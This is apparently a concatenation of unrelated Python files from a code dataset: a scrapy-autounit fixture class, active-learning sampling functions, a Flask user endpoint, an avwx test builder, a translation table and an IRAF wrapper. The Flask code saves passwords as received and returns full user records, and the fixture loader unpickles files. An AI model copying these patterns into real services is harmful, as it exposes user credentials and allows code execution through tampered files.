from scrapy.crawler import Crawler
from scrapy.utils.conf import build_component_list
from scrapy.utils.project import get_project_settings
from .utils import get_spider_class
class Cassette:
    """
    Helper class to store request, response and output data.

    A cassette captures everything needed to replay one spider callback:
    the spider identity and recorded settings, the request/response pair,
    attribute snapshots, and the callback's recorded output.
    """
    # Bump this when the recorded fixture layout changes.
    FIXTURE_VERSION = 2

    def __init__(
        self,
        spider=None,
        spider_name=None,
        request=None,
        response=None,
        init_attrs=None,
        input_attrs=None,
        output_attrs=None,
        output_data=None,
        middlewares=None,
        included_settings=None,
        python_version=None,
        filename=None,
    ):
        self.spider_name = spider_name
        self.middlewares = middlewares
        self.included_settings = included_settings
        # A live spider, when provided, overrides the explicit
        # name/middlewares/settings arguments.
        if spider:
            self.spider_name = spider.name
            self.middlewares = self._get_middlewares(spider.settings)
            self.included_settings = self._get_included_settings(spider.settings)
        self.request = request
        self.response = response
        self.init_attrs = init_attrs
        self.input_attrs = input_attrs
        self.output_attrs = output_attrs
        self.output_data = output_data
        self.filename = filename
        # Default to the interpreter that recorded the fixture.
        self.python_version = python_version or sys.version_info.major

    @classmethod
    def from_fixture(cls, fixture):
        """Load a Cassette from a zlib-compressed pickle fixture file."""
        with open(fixture, 'rb') as f:
            binary = f.read()
        cassette = pickle.loads(zlib.decompress(binary))
        return cassette

    def _get_middlewares(self, settings):
        """Return spider-middleware paths that run after AutounitMiddleware."""
        full_list = build_component_list(settings.getwithbase('SPIDER_MIDDLEWARES'))
        autounit_mw_path = list(filter(lambda x: x.endswith('AutounitMiddleware'), full_list))[0]
        start = full_list.index(autounit_mw_path)
        mw_paths = [mw for mw in full_list[start:] if mw != autounit_mw_path]
        return mw_paths

    def _get_included_settings(self, settings):
        """Return the settings the user asked to record with the fixture."""
        # Use the new setting, if empty, try the deprecated one
        names = settings.getlist('AUTOUNIT_RECORD_SETTINGS', [])
        if not names:
            names = settings.getlist('AUTOUNIT_INCLUDED_SETTINGS', [])
        included = {name: settings.get(name) for name in names}
        return included

    def get_spider(self):
        """Rebuild the recorded spider with the recorded settings applied."""
        settings = get_project_settings()
        spider_cls = get_spider_class(self.spider_name, settings)
        spider_cls.update_settings(settings)
        # Recorded settings win over project settings (priority 50).
        for k, v in self.included_settings.items():
            settings.set(k, v, priority=50)
        crawler = Crawler(spider_cls, settings)
        spider = spider_cls.from_crawler(crawler, **self.init_attrs)
        return spider

    def pack(self):
        """Serialize this cassette (pickle protocol 2, zlib-compressed)."""
        return zlib.compress(pickle.dumps(self, protocol=2))

    def to_dict(self):
        """Return a plain-dict view of the cassette (omits filename/version)."""
        return {
            'spider_name': self.spider_name,
            'request': self.request,
            'response': self.response,
            'output_data': self.output_data,
            'middlewares': self.middlewares,
            'settings': self.included_settings,
            'init_attrs': self.init_attrs,
            'input_attrs': self.input_attrs,
            'output_attrs': self.output_attrs,
        }
| StarcoderdataPython |
4817896 | <reponame>VKCOM/TopicsDataset
from typing import Union, Tuple
import math
import numpy as np
from sklearn.cluster import KMeans
from modAL.utils import multi_argmax
from modAL.models.base import BaseLearner, BaseCommittee
from sklearn.exceptions import NotFittedError
from modAL.utils.data import modALinput
from sklearn.base import BaseEstimator
import scipy.sparse as sp
from scipy.stats import entropy
def get_least_confidence(predictions):
    """Least-confidence uncertainty: 1 minus the top class probability per row."""
    top = predictions.max(axis=1)
    return 1 - top
def get_margin(predictions):
    """Negative margin between the two largest class probabilities per row.

    Returned negated so that larger values mean *more* uncertain, matching
    the other measures.
    """
    top_two = -np.partition(-predictions, 1, axis=1)[:, :2]
    return top_two[:, 1] - top_two[:, 0]
def get_entropy(predictions):
    """Shannon entropy of each row of class probabilities."""
    return entropy(predictions.T).T
# Maps the user-facing measure name to the function implementing it.
uncertainty_measure_dict = {
    'least_confident': get_least_confidence,
    'margin': get_margin,
    'entropy': get_entropy
}
def predict_by_committee(classifier: BaseEstimator, X: modALinput, cmt_size=10, **predict_proba_kwargs) -> np.ndarray:
    """Run `cmt_size` stochastic (MC-dropout) forward passes over *X*.

    Returns an array of shape (cmt_size, n_samples, n_classes).  If the
    classifier has not been fitted yet, returns a flat vector of ones
    (one uninformative score per sample) instead.
    """
    predictions = []
    for _ in range(cmt_size):
        try:
            predictions.append(classifier.predict_proba(X, with_dropout=True, **predict_proba_kwargs))
        except NotFittedError:
            # Unfitted model: fall back to a constant, uninformative score.
            return np.ones(shape=(X.shape[0],))
    return np.array(predictions)
def qbc_uncertainty_sampling(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        cmt_size: int = 10,
        uncertainty_measure='entropy',
        **dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
    """Query-by-committee uncertainty sampling via MC-dropout.

    Averages `cmt_size` stochastic predictions, scores each sample with the
    chosen uncertainty measure, and returns the indices and data of the
    `n_instances` most uncertain samples.

    :raises ValueError: for an unknown `uncertainty_measure`
    """
    if uncertainty_measure not in uncertainty_measure_dict:
        raise ValueError('uncertainty measure can be equal only to "least_confident", "margin" or "entropy"')
    committee_predictions = predict_by_committee(
        classifier=classifier,
        X=X,
        cmt_size=cmt_size,
        **dropout_uncertainty_kwargs
    )
    uncertainty = uncertainty_measure_dict[uncertainty_measure](np.mean(committee_predictions, axis=0))
    query_idx = multi_argmax(uncertainty, n_instances=n_instances)
    # Multi-modal input arrives as a list of arrays; index each modality.
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
# Elementwise x * ln(x) with the 0 * ln(0) -> 0 convention (vectorized).
dis_func = np.vectorize(lambda p: p * math.log(p) if p else 0)


def get_disagreement(committee_predictions, committee_size):
    """Average disagreement term of a prediction committee, per sample.

    Sums x*log(x) over the member axis (0) and the class axis (-1), then
    divides by the committee size, leaving one value per sample.
    """
    summed = np.sum(dis_func(committee_predictions), axis=(0, -1))
    return summed / committee_size
def bald_sampling(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        cmt_size: int = 10,
        uncertainty_measure='entropy',
        **dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
    """BALD acquisition via an MC-dropout committee.

    Scores each sample as mean-prediction uncertainty plus the committee
    disagreement term, and returns the `n_instances` highest-scoring
    samples (indices and data).

    :raises ValueError: for an unknown `uncertainty_measure`
    """
    if uncertainty_measure not in uncertainty_measure_dict:
        raise ValueError('uncertainty measure can be equal only to "least_confident", "margin" or "entropy"')
    committee_predictions = predict_by_committee(
        classifier=classifier,
        X=X,
        cmt_size=cmt_size,
        **dropout_uncertainty_kwargs
    )
    uncertainty = uncertainty_measure_dict[uncertainty_measure](np.mean(committee_predictions, axis=0))
    disagreement = get_disagreement(committee_predictions, cmt_size)
    # BALD score = entropy of the mean prediction + disagreement term.
    query_idx = multi_argmax(uncertainty + disagreement, n_instances=n_instances)
    # Multi-modal input arrives as a list of arrays; index each modality.
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
def bald_modal_sampling(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        with_dropout=True,
        **dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
    """BALD sampling with a 3-member committee built from modalities.

    The committee members are the model's predictions on: image only
    (text zeroed), text only (image zeroed), and both modalities.
    Assumes X is a two-element list [image_array, text_array] — confirm
    against callers.
    """
    img_predictions = classifier.predict_proba([X[0], np.zeros_like(X[1])], with_dropout=with_dropout)
    txt_predictions = classifier.predict_proba([np.zeros_like(X[0]), X[1]], with_dropout=with_dropout)
    both_predictions = classifier.predict_proba(X, with_dropout=with_dropout)
    committee_predictions = [img_predictions, txt_predictions, both_predictions]
    uncertainty = get_entropy(np.mean(committee_predictions, axis=0))
    # Fixed committee size of 3 (the three modality variants above).
    disagreement = get_disagreement(committee_predictions, 3)
    query_idx = multi_argmax(uncertainty + disagreement, n_instances=n_instances)
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
def get_bald_trident_measure(classifier, X, with_dropout, cmt_size):
    """Compute the BALD acquisition score for a "trident" model.

    The classifier's predict_proba is expected to return a triple
    (common, image, text) of prediction arrays; each dropout pass
    contributes all three as committee members (3 * cmt_size total).
    Returns one score per sample: entropy of the mean prediction plus
    the committee disagreement term.
    """
    committee_predictions = []
    for _ in range(cmt_size):
        common_predictions, img_predictions, txt_predictions = classifier.predict_proba(X, with_dropout=with_dropout)
        committee_predictions.append(common_predictions)
        committee_predictions.append(img_predictions)
        committee_predictions.append(txt_predictions)
    uncertainty = get_entropy(np.mean(committee_predictions, axis=0))
    disagreement = get_disagreement(committee_predictions, cmt_size * 3)
    # FIX: removed leftover debug print() calls that dumped the first ten
    # uncertainty/disagreement values on every query.
    return uncertainty + disagreement
def bald_trident_sampling(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        with_dropout=False,
        cmt_size=1,
        **dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
    """Select the `n_instances` samples with the highest BALD-trident score.

    See get_bald_trident_measure() for how the score is computed.
    """
    bald_trident_measure = get_bald_trident_measure(
        classifier=classifier,
        X=X,
        with_dropout=with_dropout,
        cmt_size=cmt_size
    )
    query_idx = multi_argmax(bald_trident_measure, n_instances=n_instances)
    # Multi-modal input arrives as a list of arrays; index each modality.
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
def bald_trident_cluster_sampling(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        with_dropout=False,
        cmt_size=1,
        transform=(lambda x: x[0]),
        **dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
    """Cluster-diversified BALD-trident sampling.

    Partitions the pool into `n_instances` k-means clusters (computed on
    `transform(X)`, by default the first modality) and picks, from each
    cluster, the sample with the highest BALD-trident score.
    """
    bald_trident_measure = get_bald_trident_measure(
        classifier=classifier,
        X=X,
        with_dropout=with_dropout,
        cmt_size=cmt_size
    )
    # FIX: cluster on the transformed features but keep the original X
    # intact.  The original rebound X to transform(X), so the returned
    # batch was sliced from the transformed array rather than the input,
    # unlike every other sampler in this module.
    features = transform(X) if transform is not None else X
    km = KMeans(n_clusters=n_instances)
    km.fit(features)
    batch = []
    for label in range(n_instances):
        idx = np.where(km.labels_ == label)[0]
        max_entropy = 0
        max_i = 0
        for i in idx:
            if bald_trident_measure[i] > max_entropy:
                max_entropy = bald_trident_measure[i]
                max_i = i
        batch.append(max_i)
    query_idx = np.array(batch)
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
def bald_trident_based_sampling(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        cmt_size=3,
        n_instances: int = 20,
        **kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
    """BALD sampling using only the trident model's *common* head.

    Each dropout pass contributes predict_proba(...)[0] (the common
    prediction) as a committee member.
    """
    committee_predictions = []
    for _ in range(cmt_size):
        committee_predictions.append(classifier.predict_proba(X, with_dropout=True)[0])
    uncertainty = get_entropy(np.mean(committee_predictions, axis=0))
    # NOTE(review): divisor is hard-coded to 3 rather than cmt_size — for the
    # default cmt_size=3 they coincide; confirm intent before changing.
    disagreement = get_disagreement(committee_predictions, 3)
    query_idx = multi_argmax(uncertainty + disagreement, n_instances=n_instances)
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
def bald_trident_bn(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        cmt_size=1,
        **dropout_uncertainty_kwargs
):
    """Trident sampling scored by the determinant of a per-sample matrix.

    Builds a committee from all three heads of each dropout pass, then for
    every sample accumulates ones + mean/outer-product terms of the member
    predictions and uses det() of that matrix as the acquisition score.
    NOTE(review): the divisor is cmt_size although 3*cmt_size members are
    appended — confirm whether that weighting is intentional.
    """
    committee_predictions = []
    for i in range(cmt_size):
        common_predictions, img_predictions, txt_predictions = classifier.predict_proba(X, with_dropout=True)
        committee_predictions.append(common_predictions)
        committee_predictions.append(img_predictions)
        committee_predictions.append(txt_predictions)
    committee_predictions = np.array(committee_predictions)
    # n = number of classes (last axis of the stacked predictions).
    n = committee_predictions.shape[2]
    uncertainty = []
    for i in range(X[0].shape[0]):
        cov = np.ones((n, n))
        mean_prediction = committee_predictions[:, i].mean(axis=0)
        # Subtract the outer product of the mean prediction with itself...
        cov -= mean_prediction.reshape(-1, 1) * mean_prediction
        # ...and add the averaged outer products of the first cmt_size members.
        for j in range(cmt_size):
            cov += committee_predictions[j][i].reshape(-1, 1) * committee_predictions[j][i] / cmt_size
        uncertainty.append(np.linalg.det(cov))
    query_idx = multi_argmax(np.array(uncertainty), n_instances=n_instances)
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
def bald_trident_based_bn(
        classifier: Union[BaseLearner, BaseCommittee],
        X: Union[np.ndarray, sp.csr_matrix],
        n_instances: int = 20,
        cmt_size=1,
        **dropout_uncertainty_kwargs
):
    """Determinant-scored sampling using only the trident's common head.

    Near-duplicate of bald_trident_bn() except the committee holds only
    predict_proba(...)[0] per pass (cmt_size members total) — consider
    merging the two implementations.
    """
    committee_predictions = []
    for _ in range(cmt_size):
        committee_predictions.append(classifier.predict_proba(X, with_dropout=True)[0])
    committee_predictions = np.array(committee_predictions)
    # n = number of classes (last axis of the stacked predictions).
    n = committee_predictions.shape[2]
    uncertainty = []
    for i in range(X[0].shape[0]):
        cov = np.ones((n, n))
        mean_prediction = committee_predictions[:, i].mean(axis=0)
        cov -= mean_prediction.reshape(-1, 1) * mean_prediction
        for j in range(cmt_size):
            cov += committee_predictions[j][i].reshape(-1, 1) * committee_predictions[j][i] / cmt_size
        uncertainty.append(np.linalg.det(cov))
    query_idx = multi_argmax(np.array(uncertainty), n_instances=n_instances)
    if isinstance(X, list) and isinstance(X[0], np.ndarray):
        new_batch = [x[query_idx] for x in X]
    else:
        new_batch = X[query_idx]
    return query_idx, new_batch
10352 | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
    """REST resource for User records (create / read; update & delete are stubs)."""

    def post(self):
        """Create a User from the JSON body; 422 if a required field is missing.

        Required: name, username, email, password.
        Optional: phone_number, experience, pictureURL.
        """
        j = request.get_json()
        # need to ensure the required fields are in the json
        # NOTE(review): the abort messages are inconsistently worded
        # ("is not in" vs "not in") — confirm before normalizing, clients
        # may match on them.
        if "name" not in j:
            abort(422, message="name is not in json body")
        else:
            name = j["name"]
        if "username" not in j:
            abort(422, message="username not in json body")
        else:
            username = j["username"]
        if "email" not in j:
            abort(422, message="email not in json body")
        else:
            email = j["email"]
        if "password" not in j:
            abort(422, message="password not in json body")
        else:
            password = j["password"]
        user_obj = User(
            name=name,
            username=username,
            email=email,
            password=password,
        )
        # Optional fields are only set when present in the payload.
        if "phone_number" in j:
            user_obj.phone_number = j["phone_number"]
        if "experience" in j:
            user_obj.experience = j["experience"]
        if "pictureURL" in j:
            user_obj.pictureURL = j["pictureURL"]
        d = user_obj.save()
        return json.loads(d.to_json())

    def put(self):
        """Update an existing User (not implemented)."""
        # TODO
        pass

    def delete(self):
        """Delete a User (not implemented)."""
        # TODO
        pass

    def get(self):
        """Fetch a User by ?username=...; 404 when not found."""
        parser = reqparse.RequestParser()
        parser.add_argument('username', required=True, type=str, help='The username of the User')
        args = parser.parse_args()
        try:
            user = json.loads(User.objects.get(username=args['username']).to_json())
        except Exception as e:
            # NOTE(review): this broad except maps *any* failure (not just
            # "does not exist") to a 404 — consider catching DoesNotExist.
            print(e)
            abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
        return user
| StarcoderdataPython |
1716244 | from . import view
from . import byte
from . import files
| StarcoderdataPython |
33207 | """
Creates files for end-to-end tests
python util/build_tests.py
"""
# stdlib
import json
from dataclasses import asdict
# module
import avwx
def make_metar_test(station: str) -> dict:
    """
    Builds METAR test file for station

    Fetches the current METAR and returns a dict of its parsed data,
    translations, summary, speech text and station info.
    """
    m = avwx.Metar(station)
    m.update()
    # Clear timestamp due to parse_date limitations
    m.data.time = None
    return {
        "data": asdict(m.data),
        "translations": asdict(m.translations),
        "summary": m.summary,
        "speech": m.speech,
        "station_info": asdict(m.station_info),
    }
def make_taf_test(station: str, report: str = None) -> dict:
    """
    Builds TAF test file for station

    Optionally parses a supplied raw *report* instead of fetching one.
    All timestamps (top level and per forecast period) are nulled out.
    """
    t = avwx.Taf(station)
    t.update(report)
    data = asdict(t.data)
    # Clear timestamp due to parse_date limitations
    for key in ("time", "start_time", "end_time"):
        data[key] = None
    for i in range(len(data["forecast"])):
        for key in ("start_time", "end_time"):
            data["forecast"][i][key] = None
    return {
        "data": data,
        "translations": asdict(t.translations),
        "summary": t.summary,
        "speech": t.speech,
        "station_info": asdict(t.station_info),
    }
def make_pirep_test(station: str) -> dict:
    """
    Builds PIREP test file for station

    Returns a dict with the parsed reports and station info, or None when
    the station has no PIREP data.
    """
    # FIX: the annotation was `-> [dict]` (a list literal, and wrong — the
    # function returns a single dict or None); the empty-data path also used
    # a bare `return`, now an explicit `return None`.
    p = avwx.Pireps(station)
    p.update()
    if not p.data:
        return None
    ret = []
    for report in p.data:
        # Clear timestamp due to parse_date limitations
        report.time = None
        ret.append({"data": asdict(report)})
    return {"reports": ret, "station_info": asdict(p.station_info)}
if __name__ == "__main__":
from pathlib import Path
for target in ("metar", "taf", "pirep"):
for station in ("KJFK", "KMCO", "PHNL", "EGLL"):
data = locals()[f"make_{target}_test"](station)
if data:
path = Path("tests", target, station + ".json")
json.dump(data, path.open("w"), indent=4, sort_keys=True)
| StarcoderdataPython |
1665072 | <gh_stars>0
"""
This module supports fast localization lookups. It contains a list of all supported languages (each written in its own language),
their language codes, and translations of the app's text into each language.
"""
langs = [
"afrikaans", "shqiptar", "አማርኛ", "عربى", "հայերեն", "Azərbaycan", "basque", "беларускі", "বাংলা",
"bosanski", "български", "català", "cebuano", "Chichewa", "简体中文", "中國傳統的", "Corsu", "Hrvatski",
"čeština", "dansk", "Nederlands", "english", "esperanto", "eesti", "filipino", "Suomalainen", "français",
"Frysk", "galician", "ქართული", "Deutsche", "Ελληνικά", "ગુજરાતી", "ayisyen kreyòl", "Hausa",
"Ōlelo Hawaiʻi", "עִברִית", "עִברִית", "हिंदी", "hmong", "Magyar", "icelandic", "igbo", "bahasa Indonesia",
"Gaeilge", "italiano", "日本語", "javanese", "ಕನ್ನಡ", "Қазақ", "ខ្មែរ", "한국어", "Kurdish (Kurmanji)",
"Кыргызча", "ລາວ", "Latine", "Latvijas", "Lietuvos", "Lëtzebuergesch", "македонски", "Malagasy", "malay",
"മലയാളം", "maltese", "maori", "मराठी", "монгол", "မြန်မာ (ဗမာ)", "नेपाली", "norsk", "ଓଡ଼ିଆ", "پښتو", "فارسی",
"Polskie", "português", "ਪੰਜਾਬੀ", "Română", "русский", "Samoa", "Gàidhlig", "Српски", "Sesotho", "shona",
"سنڌي", "සිංහල", "slovenský", "Slovenščina", "somali", "Español", "tembang sunda", "swahili", "svenska",
"тоҷик", "தமிழ்", "తెలుగు", "ไทย", "Türk", "український", "اردو", "ئۇيغۇر", "uzbek", "Tiếng Việt",
"Cymraeg", "isiXhosa", "ייִדיש", "Yoruba", "zulu"
]
codes = [
"af", "sq", "am", "ar", "hy", "az", "eu", "be", "bn", "bs", "bg", "ca", "ceb", "ny", "zh-cn", "zh-tw", "co", "hr",
"cs", "da", "nl", "en", "eo", "et", "tl", "fi", "fr", "fy", "gl", "ka", "de", "el", "gu", "ht", "ha", "haw", "iw",
"he", "hi", "hmn", "hu", "is", "ig", "id", "ga", "it", "ja", "jw", "kn", "kk", "km", "ko", "ku", "ky", "lo", "la",
"lv", "lt", "lb", "mk", "mg", "ms", "ml", "mt", "mi", "mr", "mn", "my", "ne", "no", "or", "ps", "fa", "pl", "pt",
"pa", "ro", "ru", "sm", "gd", "sr", "st", "sn", "sd", "si", "sk", "sl", "so", "es", "su", "sw", "sv", "tg", "ta",
"te", "th", "tr", "uk", "ur", "ug", "uz", "vi", "cy", "xh", "yi", "yo", "zu"
]
ans = {
"af": ["begin", "instellings", "selfmoord", "terug"],
"sq": ["fillim", "Cilësimet", "vetëvrasje", "prapa"],
"am": ["መጀመሪያ", "ቅንብሮች", "ራስን መግደል", "ወደኋላ"],
"ar": ["بداية", "إعدادات", "انتحار", "عودة"],
"hy": ["սկիզբ", "Կարգավորումներ", "ինքնասպանություն", "Վերադառնալ"],
"az": ["Başlamaq", "Settings", "intihar", "geri"],
"eu": ["start", "ezarpenak", "Suicide", "Back"],
"be": ["пачатак", "налады", "самазабойца", "назад"],
"bn": ["শুরু", "সেটিংস", "আত্মহত্যা", "পেছনে"],
"bs": ["start", "Postavke", "samoubistvo", "natrag"],
"bg": ["начало", "Настройки", "самоубийство", "обратно"],
"ca": ["Començar", "ajustos", "suïcidi", "esquena"],
"ceb": ["Start", "setting", "paghikog", "balik"],
"ny": ["Start", "Zikhazikiko", "kudzipha", "Back"],
"zh-cn": ["开始", "设置", "自杀", "后退"],
"zh-tw": ["開始", "設置", "自殺", "後退"],
"co": ["Start", "Settings", "Mariposa", "Torna"],
"hr": ["Početak", "postavke", "samoubistvo", "leđa"],
"cs": ["Start", "Nastavení", "Sebevražda", "Zadní"],
"da": ["Start", "Indstillinger", "Selvmord", "Tilbage"],
"nl": ["Begin", "instellingen", "Zelfmoord", "Terug"],
"en": ["Start", "Settings", "Suicide", "Back"],
"eo": ["komenco", "Agordoj", "memmortigo", "reen"],
"et": ["algus", "seaded", "enesetapp", "tagasi"],
"tl": ["simula", "Mga Setting", "pagpapakamatay", "likod"],
"fi": ["alkaa", "asetukset", "Itsemurha", "Takaisin"],
"fr": ["Démarrer", "Paramètres", "Suicide", "Dos"],
"fy": ["Start", "ynstellings", "Selsmoard", "Rêch"],
"gl": ["comezo", "configuración", "suicidio", "de volta"],
"ka": ["დაწყება", "პარამეტრები", "Suicide", "უკან"],
"de": ["Start", "die Einstellungen", "Selbstmord", "Zurück"],
"el": ["Αρχή", "Ρυθμίσεις", "Αυτοκτονία", "Πίσω"],
"gu": ["શરૂઆત", "સેટિંગ્સ", "આત્મઘાતી", "પાછા"],
"ht": ["Kòmanse", "anviwònman", "swisid", "Retounen"],
"ha": ["Fara", "Saituna", "Kashe Kanta", "baya"],
"haw": ["Ka hoʻomaka '", "palapala koho", "he pepehi anaʻia iā iho", "Back"],
"iw": ["הַתחָלָה", "הגדרות", "הִתאַבְּדוּת", "חזור"],
"he": ["הַתחָלָה", "הגדרות", "הִתאַבְּדוּת", "חזור"],
"hi": ["शुरू", "समायोजन", "आत्मघाती", "वापस"],
"hmn": ["Start", "chaw", "yus tua yus", "Rov qab"],
"hu": ["Rajt", "Beállítások", "Öngyilkosság", "Vissza"],
"is": ["Start", "Stillingar", "sjálfsvíg", "Back"],
"ig": ["Malite", "Settings", "igbu onwe", "Back"],
"id": ["Mulailah", "pengaturan", "Bunuh diri", "Kembali"],
"ga": ["Tosaigh", "Socruithe", "Féinmharú", "Ar ais"],
"it": ["Inizio", "impostazioni", "Suicidio", "Indietro"],
"ja": ["開始", "設定", "自殺", "バック"],
"jw": ["Mulai", "Setelan", "lampus", "Back"],
"kn": ["ಪ್ರಾರಂಭಿಸಿ", "ಸಂಯೋಜನೆಗಳು", "ಸುಸೈಡ್", "ಬ್ಯಾಕ್"],
"kk": ["бастау", "Параметрлер", "Суицид", "артқа"],
"km": ["ចាប់ផ្តើម", "ការកំណត់", "ការធ្វើអត្តឃាត", "ត្រលប់ក្រោយ"],
"ko": ["스타트", "설정", "자살", "뒤"],
"ku": ["Destpêkirin", "Mîhengên", "Xwekûştinî", "Paş"],
"ky": ["баштоо", "Орнотуулар", "өзүн өзү өлтүрүү", "кайра"],
"lo": ["ເລີ່ມຕົ້ນ", "ການຕັ້ງຄ່າ", "suicide", "ກັບຄືນໄປບ່ອນ"],
"la": ["initium", "Optiones", "mortem", "Back"],
"lv": ["Sākt", "Iestatījumi", "pašnāvība", "atpakaļ"],
"lt": ["pradžia", "Nustatymai", "savižudybė", "atgal"],
"lb": ["Start", "Astellunge", "ëmbruecht", "Back"],
"mk": ["почеток", "Подесувања", "самоубиството", "назад"],
"mg": ["fanombohana", "Fikirana", "Mamono Tena", "indray"],
"ms": ["Start", "tetapan", "bunuh diri", "Kembali"],
"ml": ["തുടക്കം", "ക്രമീകരണങ്ങൾ", "ആത്മഹത്യ", "തിരികെ"],
"mt": ["bidu", "settings", "suwiċidju", "lura"],
"mi": ["Tīmata", "tautuhinga", "whakamomori", "Hoki"],
"mr": ["प्रारंभ", "सेटिंग्ज", "आत्महत्या", "मागे"],
"mn": ["Start", "Тохиргоо", "амиа хорлох", "Буцах Give"],
"my": ["စတင်", "Settings များ", "မိမိကိုယ်မိမိသတ်သေခြင်း", "ပြန်."],
"ne": ["सुरु", "सेटिङहरू", "आत्महत्या", "फिर्ता"],
"no": ["Start", "innstillinger", "Selvmord", "Tilbake"],
"or": ["ଆରମ୍ଭ", "ସେଟିଂସମୂହ", "ଆତ୍ମହତ୍ଯା", "ପିଠି"],
"ps": ["د پیل", "امستنې", "ځانمرګي", "Back"],
"fa": ["شروع", "تنظیمات", "خودکشی کردن", "بازگشت"],
"pl": ["Początek", "Ustawienia", "Samobójstwo", "Z powrotem"],
"pt": ["Começar", "Definições", "Suicídio", "Voltar"],
"pa": ["ਸ਼ੁਰੂ", "ਸੈਟਿੰਗ", "ਖੁਦਕੁਸ਼ੀ", "ਵਾਪਸ"],
"ro": ["start", "Setări", "Sinucidere", "Înapoi"],
"ru": ["Начинать", "Настройки", "самоубийца", "Назад"],
"sm": ["āmata", "tulaga", "tōaʻi", "tua"],
"gd": ["Start", "Roghainnean", "Suicide", "Back"],
"sr": ["Почетак", "Подешавања", "самоубиство", "Назад"],
"st": ["Qala", "Litlhophiso", "ho ipolaea", "morao"],
"sn": ["kutanga", "Settings", "kuzvisungirira", "shure"],
"sd": ["شروع", "جوڙ", "آپگهات", "واپس"],
"si": ["ආරම්භයක්", "සැකසුම්", "මරාගෙන මැරෙන", "ආපසු"],
"sk": ["štart", "nastavenie", "samovražda", "späť"],
"sl": ["Začetek", "Nastavitve", "samomor", "Nazaj"],
"so": ["Start", "Settings", "ismiidaamin ah", "Back"],
"es": ["Comienzo", "Ajustes", "Suicidio", "atrás"],
"su": ["ngamimitian", "setélan", "maehan maneh", "balik deui"],
"sw": ["Start", "mipangilio", "Suicide", "Back"],
"sv": ["Start", "inställningar", "Självmord", "Tillbaka"],
"tg": ["Оғоз", "Танзимот", "худкушӣ", "Бозгашт"],
"ta": ["தொடக்கம்", "அமைப்புகள்", "தற்கொலை", "மீண்டும்"],
"te": ["ప్రారంభం", "సెట్టింగులు", "ఆత్మహత్య", "తిరిగి"],
"th": ["เริ่มต้น", "การตั้งค่า", "การฆ่าตัวตาย", "กลับ"],
"tr": ["Başlat", "Ayarlar", "İntihar", "Geri"],
"uk": ["початок", "настройки", "самогубець", "назад"],
"ur": ["شروع کریں", "ترتیبات", "خودکش", "پیچھے"],
"ug": ["жүргүзмәк", "تەڭشەكلىرى", "өз-өзини өлтүрүш", "قايتىپ"],
"uz": ["boshlanish", "Sozlamalar", "o'zini o'zi o'ldirish", "orqaga"],
"vi": ["Khởi đầu", "Cài đặt", "tự vận", "Trở lại"],
"cy": ["Dechrau", "gosodiadau", "hunanladdiad", "Yn ôl"],
"xh": ["Qala", "izicwangciso", "ukuzibulala", "buyela umva"],
"yi": ["אָנהייב", "סעטטינגס", "זעלבסטמאָרד", "צוריק"],
"yo": ["Bẹrẹ", "Ètò", "ara", "Back"],
"zu": ["Qala", "Amasethingi", "Ukuzibulala", "Emuva"],
}
| StarcoderdataPython |
3346766 | <reponame>iraf-community/stsdas
from __future__ import print_function
import iraf
import os
# Re-export IRAF boolean constants for task parameter handling.
no = iraf.no
yes = iraf.yes
from nictools import rnlincor

# Point to default parameter file for task
_parfile = 'nicmos$rnlincor.par'
_taskname = 'rnlincor'

######
# Set up Python IRAF interface here
######
def rnlincor_iraf(input, output, nozpcorr):
    """IRAF-facing wrapper for the Python `rnlincor` task.

    Exports the `nref`/`nicmos` IRAF symbol-set paths as environment
    variables (if not already set), then delegates to `rnlincor.run`.
    Errors are printed rather than raised — presumably the IRAF task
    convention; confirm before changing.
    """
    # Grab the iraf symbolset & stuff them in the environment variable.
    if 'nref' not in os.environ:
        os.environ['nref'] = iraf.osfn('nref$')
    if 'nicmos' not in os.environ:
        os.environ['nicmos'] = iraf.osfn('nicmos$')
    # Handle optional file specifications
    opt = {'nozpcorr': nozpcorr}
